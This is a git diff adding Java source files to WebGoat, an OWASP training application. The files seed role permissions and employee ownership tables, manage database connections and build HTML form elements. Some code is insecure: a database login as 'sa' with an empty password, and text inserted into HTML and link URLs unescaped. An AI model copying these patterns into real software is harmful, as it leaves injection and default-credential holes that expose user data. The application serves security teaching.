+	String insertData4_2 = "INSERT INTO auth VALUES('employee', 'FindProfile')";
+	String insertData5 = "INSERT INTO auth VALUES('manager', 'Logout')";
+	String insertData6 = "INSERT INTO auth VALUES('manager', 'ListStaff')";
+	String insertData7 = "INSERT INTO auth VALUES('manager', 'ViewProfile')";
+	String insertData7_1 = "INSERT INTO auth VALUES('manager', 'SearchStaff')";
+	String insertData7_2 = "INSERT INTO auth VALUES('manager', 'FindProfile')";
+	//		String insertData8 = "INSERT INTO auth VALUES('manager', 'EditProfile')";
+	//		String insertData9 = "INSERT INTO auth VALUES('manager', 'CreateProfile')";
+	//		String insertData10 = "INSERT INTO auth VALUES('manager', 'DeleteProfile')";
+	//		String insertData11 = "INSERT INTO auth VALUES('manager', 'UpdateProfile')";
+	String insertData12 = "INSERT INTO auth VALUES('hr', 'Logout')";
+	String insertData13 = "INSERT INTO auth VALUES('hr', 'ListStaff')";
+	String insertData14 = "INSERT INTO auth VALUES('hr', 'ViewProfile')";
+	String insertData15 = "INSERT INTO auth VALUES('hr', 'EditProfile')";
+	String insertData16 = "INSERT INTO auth VALUES('hr', 'CreateProfile')";
+	String insertData17 = "INSERT INTO auth VALUES('hr', 'DeleteProfile')";
+	String insertData18 = "INSERT INTO auth VALUES('hr', 'UpdateProfile')";
+	String insertData18_1 = "INSERT INTO auth VALUES('hr', 'SearchStaff')";
+	String insertData18_2 = "INSERT INTO auth VALUES('hr', 'FindProfile')";
+	String insertData19 = "INSERT INTO auth VALUES('admin', 'Logout')";
+	String insertData20 = "INSERT INTO auth VALUES('admin', 'ListStaff')";
+	String insertData21 = "INSERT INTO auth VALUES('admin', 'ViewProfile')";
+	String insertData22 = "INSERT INTO auth VALUES('admin', 'EditProfile')";
+	String insertData23 = "INSERT INTO auth VALUES('admin', 'CreateProfile')";
+	String insertData24 = "INSERT INTO auth VALUES('admin', 'DeleteProfile')";
+	String insertData25 = "INSERT INTO auth VALUES('admin', 'UpdateProfile')";
+	String insertData25_1 = "INSERT INTO auth VALUES('admin', 'SearchStaff')";
+	String insertData25_2 = "INSERT INTO auth VALUES('admin', 'FindProfile')";
+
+	// Add a permission for the webgoat role to see the source.
+	// The challenge(s) will change the default role to "challenge" 
+	String insertData26 = "INSERT INTO auth VALUES('"
+		+ AbstractLesson.USER_ROLE + "','" + WebSession.SHOWSOURCE
+		+ "')";
+	String insertData27 = "INSERT INTO auth VALUES('"
+		+ AbstractLesson.USER_ROLE + "','" + WebSession.SHOWHINTS
+		+ "')";
+	// Add a permission for the webgoat role to see the solution.
+	// The challenge(s) will change the default role to "challenge" 
+	String insertData28 = "INSERT INTO auth VALUES('"
+		+ AbstractLesson.USER_ROLE + "','" + WebSession.SHOWSOLUTION
+		+ "')";
+
+	statement.executeUpdate(insertData1);
+	statement.executeUpdate(insertData2);
+	statement.executeUpdate(insertData3);
+	statement.executeUpdate(insertData4);
+	statement.executeUpdate(insertData4_1);
+	statement.executeUpdate(insertData4_2);
+	statement.executeUpdate(insertData5);
+	statement.executeUpdate(insertData6);
+	statement.executeUpdate(insertData7);
+	statement.executeUpdate(insertData7_1);
+	statement.executeUpdate(insertData7_2);
+	//		statement.executeUpdate(insertData8);
+	//		statement.executeUpdate(insertData9);
+	//		statement.executeUpdate(insertData10);
+	//		statement.executeUpdate(insertData11);
+	statement.executeUpdate(insertData12);
+	statement.executeUpdate(insertData13);
+	statement.executeUpdate(insertData14);
+	statement.executeUpdate(insertData15);
+	statement.executeUpdate(insertData16);
+	statement.executeUpdate(insertData17);
+	statement.executeUpdate(insertData18);
+	statement.executeUpdate(insertData18_1);
+	statement.executeUpdate(insertData18_2);
+	statement.executeUpdate(insertData19);
+	statement.executeUpdate(insertData20);
+	statement.executeUpdate(insertData21);
+	statement.executeUpdate(insertData22);
+	statement.executeUpdate(insertData23);
+	statement.executeUpdate(insertData24);
+	statement.executeUpdate(insertData25);
+	statement.executeUpdate(insertData25_1);
+	statement.executeUpdate(insertData25_2);
+	statement.executeUpdate(insertData26);
+	statement.executeUpdate(insertData27);
+	statement.executeUpdate(insertData28);
+    }
+
+
+    private void createOwnershipTable(Connection connection)
+	    throws SQLException
+    {
+	Statement statement = connection.createStatement();
+
+	try
+	{
+	    String dropTable = "DROP TABLE ownership";
+	    statement.executeUpdate(dropTable);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error: unable to drop ownership");
+	}
+
+	try
+	{
+	    String createTable = "CREATE TABLE ownership ("
+		    + "employer_id INT NOT NULL," + "employee_id INT NOT NULL,"
+		    + "PRIMARY KEY (employee_id, employer_id)" + ")";
+
+	    statement.executeUpdate(createTable);
+	}
+	catch (SQLException e)
+	{
+	    System.out.println("Error: unable to create ownership table");
+	}
+
+	String inputData = "INSERT INTO ownership VALUES (112, 101)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (112, 102)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (112, 103)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (112, 104)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (112, 105)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (112, 106)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (112, 107)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (112, 108)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (112, 109)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (112, 110)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (112, 111)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (112, 112)";
+	statement.executeUpdate(inputData);
+
+	inputData = "INSERT INTO ownership VALUES (102, 101)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (102, 102)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (102, 103)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (102, 104)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (102, 105)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (102, 106)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (102, 107)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (102, 108)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (102, 109)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (102, 110)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (102, 111)";
+	statement.executeUpdate(inputData);
+
+	inputData = "INSERT INTO ownership VALUES (111, 101)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (111, 102)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (111, 103)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (111, 104)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (111, 105)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (111, 106)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (111, 107)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (111, 108)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (111, 109)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (111, 110)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (111, 111)";
+	statement.executeUpdate(inputData);
+
+	inputData = "INSERT INTO ownership VALUES (106, 105)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (106, 106)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (106, 110)";
+	statement.executeUpdate(inputData);
+
+	inputData = "INSERT INTO ownership VALUES (101, 101)";
+	statement.executeUpdate(inputData);
+
+	inputData = "INSERT INTO ownership VALUES (103, 103)";
+	statement.executeUpdate(inputData);
+
+	inputData = "INSERT INTO ownership VALUES (107, 104)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (107, 108)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (107, 109)";
+	statement.executeUpdate(inputData);
+	inputData = "INSERT INTO ownership VALUES (107, 107)";
+	statement.executeUpdate(inputData);
+
+	inputData = "INSERT INTO ownership VALUES (105, 105)";
+	statement.executeUpdate(inputData);
+
+	inputData = "INSERT INTO ownership VALUES (110, 110)";
+	statement.executeUpdate(inputData);
+
+	inputData = "INSERT INTO ownership VALUES (104, 104)";
+	statement.executeUpdate(inputData);
+
+	inputData = "INSERT INTO ownership VALUES (108, 108)";
+	statement.executeUpdate(inputData);
+
+	inputData = "INSERT INTO ownership VALUES (109, 109)";
+	statement.executeUpdate(inputData);
+
+    }
+
+
+    //--------------------------------------------------------------------------
+    //
+    //  End of WebGoat Financials
+    //
+    //--------------------------------------------------------------------------
+
+    /**
+     * Description of the Method
+     *
+     * @param connection Description of the Parameter
+     *
+     * @exception SQLException Description of the Exception
+     */
+    public void makeDB(Connection connection) throws SQLException
+    {
+	System.out.println("Successful connection to database");
+	createUserDataTable(connection);
+	createLoginTable(connection);
+	createUserAdminTable(connection);
+	createProductTable(connection);
+	createMessageTable(connection);
+	createEmployeeTable(connection);
+	createRolesTable(connection);
+	createAuthTable(connection);
+	createOwnershipTable(connection);
+	createWeatherDataTable(connection);
+	System.out.println("Success: creating tables.");
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/DatabaseUtilities.java b/main/project/JavaSource/org/owasp/webgoat/session/DatabaseUtilities.java
new file mode 100644
index 000000000..b208677d8
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/DatabaseUtilities.java
@@ -0,0 +1,171 @@
+package org.owasp.webgoat.session;
+
+import java.io.IOException;
+import java.sql.Connection;
+import java.sql.DriverManager;
+import java.sql.ResultSet;
+import java.sql.ResultSetMetaData;
+import java.sql.SQLException;
+import java.util.HashMap;
+import java.util.Map;
+
+import org.apache.ecs.MultiPartElement;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ */
+public class DatabaseUtilities
+{
+
+	private static Map<String, Connection> connections = new HashMap<String, Connection>();
+	private static Map<String, Boolean> dbBuilt = new HashMap<String, Boolean>();
+	
+	public static Connection getConnection(WebSession s) 
+	throws ClassNotFoundException, SQLException 
+	{
+		return getConnection(s.getUserName(), s.getWebgoatContext());
+	}
+	
+	public static synchronized Connection getConnection(String user, WebgoatContext context) 
+		throws ClassNotFoundException, SQLException 
+	{
+		Connection conn = connections.get(user);
+		if (conn != null && !conn.isClosed())
+			return conn;
+		conn = makeConnection(user, context);
+		connections.put(user, conn);
+		
+		if (dbBuilt.get(user) == null) {
+			new CreateDB().makeDB(conn);
+			dbBuilt.put(user, Boolean.TRUE);
+		}
+		
+		return conn;
+	}
+	
+	public static synchronized void returnConnection(String user)
+	{
+		try
+		{
+		Connection connection = connections.get(user);
+		if (connection == null || connection.isClosed())
+			return;
+		
+		if (connection.getMetaData().getDatabaseProductName().toLowerCase().contains("oracle"))
+			connection.close();
+		}
+		catch (SQLException sqle)
+		{
+			sqle.printStackTrace();
+		}
+	}
+	
+    private static Connection makeConnection(String user, WebgoatContext context)
+    	throws ClassNotFoundException, SQLException
+    {
+		Class.forName(context.getDatabaseDriver());
+
+		if (context.getDatabaseConnectionString().contains("hsqldb"))
+    		return getHsqldbConnection(user, context);
+		
+		String userPrefix = context.getDatabaseUser();
+		String password = context.getDatabasePassword();
+		String url = context.getDatabaseConnectionString();
+		return DriverManager.getConnection(url, userPrefix + "_" + user, password);
+    }
+
+    private static Connection getHsqldbConnection(String user, WebgoatContext context)
+	throws ClassNotFoundException, SQLException
+	{
+		String url = context.getDatabaseConnectionString().replaceAll("\\$\\{USER\\}", user);
+		return DriverManager.getConnection(url, "sa", "");
+	}
+    /**
+     * Description of the Method
+     *
+     * @param results Description of the Parameter
+     * @param resultsMetaData Description of the Parameter
+     *
+     * @return Description of the Return Value
+     *
+     * @exception IOException Description of the Exception
+     * @exception SQLException Description of the Exception
+     */
+    public static MultiPartElement writeTable(ResultSet results,
+	    ResultSetMetaData resultsMetaData) throws IOException, SQLException
+    {
+	int numColumns = resultsMetaData.getColumnCount();
+	results.beforeFirst();
+
+	if (results.next())
+	{
+	    Table t = new Table(1); // 1 = with border
+	    t.setCellPadding(1);
+
+	    TR tr = new TR();
+
+	    for (int i = 1; i < (numColumns + 1); i++)
+	    {
+		tr.addElement(new TD(new B(resultsMetaData.getColumnName(i))));
+	    }
+
+	    t.addElement(tr);
+	    results.beforeFirst();
+
+	    while (results.next())
+	    {
+		TR row = new TR();
+
+		for (int i = 1; i < (numColumns + 1); i++)
+		{
+			String str = results.getString(i);
+			if (str == null)
+				str = "";
+		    row.addElement(new TD(str.replaceAll(" ", "&nbsp;")));
+		}
+
+		t.addElement(row);
+	    }
+
+	    return (t);
+	}
+	else
+	{
+	    return (new B(
+		    "Query Successful; however no data was returned from this query."));
+	}
+    }
+    
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java b/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java
new file mode 100644
index 000000000..70484ff1d
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java
@@ -0,0 +1,715 @@
+package org.owasp.webgoat.session;
+
+import java.util.Iterator;
+import java.util.List;
+import java.util.StringTokenizer;
+import java.util.Vector;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.H3;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.Label;
+import org.apache.ecs.html.Option;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.Select;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.U;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams (jeff.williams@aspectsecurity.com)
+ * @created    October 29, 2003
+ */
+
+public class ECSFactory
+{
+
+    /**
+     *  Description of the Field
+     */
+
+    public final static String ON = "On";
+
+    /**
+     *  Description of the Field
+     */
+
+    public final static String PASSWORD = "Password";
+
+
+    /**
+     *  Don't let anyone instantiate this class
+     */
+
+    private ECSFactory()
+    {}
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  name   Description of the Parameter
+     * @param  value  Description of the Parameter
+     * @return        Description of the Return Value
+     */
+
+    public static Element makeBox(String name, String value)
+    {
+
+	Input i = new Input(Input.CHECKBOX, name, ON);
+
+	i.setChecked(value.equals(ON));
+
+	return (i);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  text  Description of the Parameter
+     * @return       Description of the Return Value
+     */
+
+    public static Element makeButton(String text)
+    {
+
+	Input b = new Input();
+
+	b.setType(Input.SUBMIT);
+	b.setValue(text);
+	b.setName(Input.SUBMIT);
+
+	return (b);
+    }
+
+    public static Element makeButton(String text, String onClickFunction)
+    {
+
+	Input b = (Input)makeButton(text);
+	b.setOnClick(onClickFunction);
+	
+	return (b);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  labeltext  Description of the Parameter
+     * @param  value      Description of the Parameter
+     * @param  e          Description of the Parameter
+     * @return            Description of the Return Value
+     */
+
+    public static TR makeField(String labeltext, String value, Element e)
+    {
+
+	TD left = new TD().setAlign("right");
+
+	Label label = new Label().addElement(labeltext);
+
+	left.addElement(label);
+
+	TD right = new TD().setAlign("left");
+
+	right.addElement(e);
+
+	TR row = new TR();
+
+	row.addElement(left);
+
+	row.addElement(right);
+
+	return (row);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  labeltext  Description of the Parameter
+     * @param  name       Description of the Parameter
+     * @param  value      Description of the Parameter
+     * @param  size       Description of the Parameter
+     * @return            Description of the Return Value
+     */
+
+    public static TR makeField(String labeltext, String name, String value,
+	    int size)
+    {
+
+	Input field = new Input().setName(name).setValue(value).setSize(size)
+		.setMaxlength(size);
+
+	// double check in case someone means to make a * starred out password field
+
+	if (name.equals(PASSWORD))
+	{
+
+	    field.setType(Input.PASSWORD);
+
+	}
+
+	return (makeField(labeltext, value, field));
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  label      Description of the Parameter
+     * @param  type       Description of the Parameter
+     * @param  name       Description of the Parameter
+     * @param  value      Description of the Parameter
+     * @param  alignment  Description of the Parameter
+     * @param  selected   Description of the Parameter
+     * @return            Description of the Return Value
+     */
+
+    public static Element makeInput(String label, String type, String name,
+	    boolean value, boolean selected, String alignment)
+    {
+
+	return makeInput(label, type, name, new Boolean(value).toString(),
+		selected, alignment);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  label  Description of the Parameter
+     * @param  type   Description of the Parameter
+     * @param  name   Description of the Parameter
+     * @param  value  Description of the Parameter
+     * @return        Description of the Return Value
+     */
+
+    public static Element makeInput(String label, String type, String name,
+	    String value)
+    {
+
+	return makeInput(label, type, name, value, new Boolean(value)
+		.booleanValue(), "RIGHT");
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  label      Description of the Parameter
+     * @param  type       Description of the Parameter
+     * @param  name       Description of the Parameter
+     * @param  value      Description of the Parameter
+     * @param  alignment  Description of the Parameter
+     * @param  selected   Description of the Parameter
+     * @return            Description of the Return Value
+     */
+
+    public static Element makeInput(String label, String type, String name,
+	    String value, boolean selected, String alignment)
+    {
+
+	ElementContainer ec = new ElementContainer();
+
+	if (!alignment.equalsIgnoreCase("LEFT"))
+	{
+
+	    ec.addElement(new StringElement(label));
+
+	}
+
+	Input input = new Input(type, name, value);
+
+	ec.addElement(input);
+
+	if (alignment.equalsIgnoreCase("LEFT"))
+	{
+
+	    ec.addElement(new StringElement(label));
+
+	}
+
+	if (type.equalsIgnoreCase("CHECKBOX"))
+	{
+
+	    input.setChecked(selected);
+
+	}
+
+	return (ec);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  text   Description of the Parameter
+     * @param  name   Description of the Parameter
+     * @param  value  Description of the Parameter
+     * @return        Description of the Return Value
+     */
+
+    public static A makeLink(String text, String name, String value)
+    {
+
+	String href = "attack?" + name;
+
+	if (value.length() > 0)
+	{
+
+	    href = href + "=" + value;
+
+	}
+
+	A a = new A(href);
+
+	a.addElement(new U().addElement(text));
+
+	a.addAttribute("style", "cursor:hand");
+
+	return (a);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  text   Description of the Parameter
+     * @param  name   Description of the Parameter
+     * @param  value  Description of the Parameter
+     * @return        Description of the Return Value
+     */
+
+    public static A makeLink(String text, String name, int value)
+    {
+
+	return (makeLink(text, name, Integer.toString(value)));
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  text   Description of the Parameter
+     * @param  name   Description of the Parameter
+     * @param  value  Description of the Parameter
+     * @return        Description of the Return Value
+     */
+
+    public static A makeLink(String text, String name, boolean value)
+    {
+
+	return (makeLink(text, name, new Boolean(value).toString()));
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  text         Description of the Parameter
+     * @param  clickAction  Description of the Parameter
+     * @param  type         Description of the Parameter
+     * @return              Description of the Return Value
+     */
+
+    public static Input makeOnClickInput(String text, String clickAction,
+	    String type)
+    {
+
+	Input b = new Input();
+
+	b.setType(type);
+
+	b.setValue(text);
+
+	b.setOnClick(clickAction);
+
+	return (b);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  labeltext  Description of the Parameter
+     * @param  value      Description of the Parameter
+     * @param  e          Description of the Parameter
+     * @return            Description of the Return Value
+     */
+
+    public static TR makeOption(String labeltext, String value, Element e)
+    {
+
+	TD left = new TD().setAlign("left").setWidth("10%");
+
+	left.addElement(e);
+
+	TD right = new TD().setAlign("right");
+
+	Label label = new Label().addElement(labeltext);
+
+	right.addElement(label);
+
+	TR row = new TR();
+
+	row.addElement(right);
+
+	row.addElement(left);
+
+	return (row);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  label  Description of the Parameter
+     * @param  value  Description of the Parameter
+     * @return        Description of the Return Value
+     */
+
+    public static Option makeOption(String label, boolean value)
+    {
+
+	Option option = new Option(label, new Boolean(value).toString());
+
+	option.setSelected(value);
+
+	return option;
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  line  Description of the Parameter
+     * @return       Description of the Return Value
+     */
+
+    private static org.apache.ecs.html.Option makeOption(String line)
+    {
+
+	StringTokenizer st = new StringTokenizer(line, "|");
+
+	org.apache.ecs.html.Option o = new org.apache.ecs.html.Option();
+
+	String token = "";
+
+	if (st.hasMoreTokens())
+	{
+
+	    token = st.nextToken();
+
+	}
+
+	o.addElement(token);
+
+	return (o);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  name     Description of the Parameter
+     * @param  options  Description of the Parameter
+     * @return          Description of the Return Value
+     */
+
+    public static Element makePulldown(String name, List<String> options)
+    {
+
+	Select s = new Select(name);
+
+	s.addElement(options.toArray(new String[options.size()]));
+
+	return (s);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  results  Description of the Parameter
+     * @return          Description of the Return Value
+     */
+
+    public static Element makePulldown(String name, String results)
+    {
+
+	Select select = new Select(name);
+
+	StringTokenizer st = new StringTokenizer(results, "\n");
+
+	if (!st.hasMoreTokens())
+	{
+
+	    return (new StringElement(""));
+	}
+
+	while (st.hasMoreTokens())
+	{
+
+	    String line = st.nextToken();
+
+	    select.addElement(makeOption(line));
+
+	}
+
+	select.addElement("-------------------------");
+
+	return (select);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  name         Description of the Parameter
+     * @param  list         Description of the Parameter
+     * @param  selected     Description of the Parameter
+     * @param  rowsShowing  Description of the Parameter
+     * @return              Description of the Return Value
+     */
+
+    public static Select makePulldown(String name, Object[] list,
+	    String selected, int rowsShowing)
+    {
+
+	Select select = new Select(name);
+
+	for (int loop = 0; loop < list.length; loop++)
+	{
+
+	    String value = list[loop].toString();
+
+	    org.apache.ecs.html.Option o = new org.apache.ecs.html.Option(
+		    value, value, value);
+
+	    if (value.equals(selected))
+	    {
+
+		o.setSelected(true);
+
+	    }
+
+	    select.addElement(o);
+
+	}
+
+	select.setSize(rowsShowing);
+
+	return select;
+    }
+
+
+    /**
+     *  Default size of 1 for rows showing in select box.
+     *
+     * @param  diffNames  Description of the Parameter
+     * @param  select     Description of the Parameter
+     * @param  name       Description of the Parameter
+     * @param  options    Description of the Parameter
+     * @param  list       Description of the Parameter
+     * @param  selected   Description of the Parameter
+     * @return            Description of the Return Value
+     */
+
+    public static Element makeSelect(boolean diffNames, Select select,
+	    String name, Vector<Option> options, String[] list, String selected)
+    {
+
+	return makeSelect(diffNames, select, name, options, list, selected, 1);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  diffNames    Description of the Parameter
+     * @param  select       Description of the Parameter
+     * @param  name         Description of the Parameter
+     * @param  options      Description of the Parameter
+     * @param  list         Description of the Parameter
+     * @param  selected     Description of the Parameter
+     * @param  rowsShowing  Description of the Parameter
+     * @return              Description of the Return Value
+     */
+
+    public static Select makeSelect(boolean diffNames, Select select,
+	    String name, Vector<Option> options, String[] list, String selected,
+	    int rowsShowing)
+    {
+
+	if (select == null)
+	{
+
+	    select = new Select(name);
+
+	    if (diffNames)
+	    {
+
+		for (int loop = 0; loop < list.length; loop += 2)
+		{
+
+		    String value = list[loop];
+
+		    String label = list[loop + 1];
+
+		    Option o = new Option(value);
+
+		    if (loop == 0)
+		    {
+
+			o.setSelected(true);
+
+		    }
+
+		    options.addElement(o);// add to Vector containing all options
+
+		    select.addElement(o);
+
+		    select.addElement(label);
+
+		}
+
+	    }
+
+	    else
+	    {
+
+		for (int loop = 0; loop < list.length; loop++)
+		{
+
+		    String value = list[loop];
+
+		    org.apache.ecs.html.Option o = new org.apache.ecs.html.Option(
+			    value);
+
+		    if (loop == 0)
+		    {
+
+			o.setSelected(true);
+
+		    }
+
+		    options.addElement(o);// add to Vector containing all options
+
+		    select.addElement(o);
+
+		    select.addElement(value);
+
+		}
+
+	    }
+
+	}
+
+	// find selected option and set selected
+
+	Iterator i = options.iterator();
+
+	while (i.hasNext())
+	{
+
+	    org.apache.ecs.html.Option o = (org.apache.ecs.html.Option) i
+		    .next();
+
+	    if (selected.equalsIgnoreCase(o.getAttribute("value")))
+	    {
+
+		o.setSelected(true);
+
+	    }
+
+	}
+
+	select.setSize(rowsShowing);
+
+	return (select);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  title  Description of the Parameter
+     * @return        Description of the Return Value
+     */
+    public static Element makeTallHeader(String title)
+    {
+	StringBuffer buff = new StringBuffer();
+	for (int i = 0; i < title.length(); i++)
+	{
+	    buff.append(title.charAt(i));
+	    buff.append("<BR>");
+	}
+	return new TH(buff.toString());
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  title  Description of the Parameter
+     * @param  text   Description of the Parameter
+     * @return        Description of the Return Value
+     */
+
+    public static Element makeTextArea(String title, String text)
+    {
+
+	ElementContainer ec = new ElementContainer();
+
+	ec.addElement(new BR());
+
+	ec.addElement(new H3().addElement(title));
+
+	ec.addElement(new P());
+
+	ec.addElement("<CENTER><TEXTAREA ROWS=10 COLS=90 READONLY>" + text
+		+ "</TEXTAREA></CENTER>");
+
+	ec.addElement(new BR());
+
+	ec.addElement(new BR());
+
+	return (ec);
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/Employee.java b/main/project/JavaSource/org/owasp/webgoat/session/Employee.java
new file mode 100644
index 000000000..fd297cfb1
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/Employee.java
@@ -0,0 +1,271 @@
+package org.owasp.webgoat.session;
+
+import java.io.Serializable;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class Employee implements Serializable
+{
+
+    /**
+	 * 
+	 */
+	private static final long serialVersionUID = -1901957360367218399L;
+
+	public final static String EMPLOYEE_ROLE = "employee";
+
+    public final static String MANAGER_ROLE = "manager";
+
+    public final static String HR_ROLE = "hr";
+
+    private int id;
+
+    private String firstName;
+
+    private String lastName;
+
+    private String title;
+
+    private String ssn;
+
+    private String phone;
+
+    private String address1;
+
+    private String address2;
+
+    private int manager;
+
+    private String startDate;
+
+    private int salary;
+
+    private String ccn;
+
+    private int ccnLimit;
+
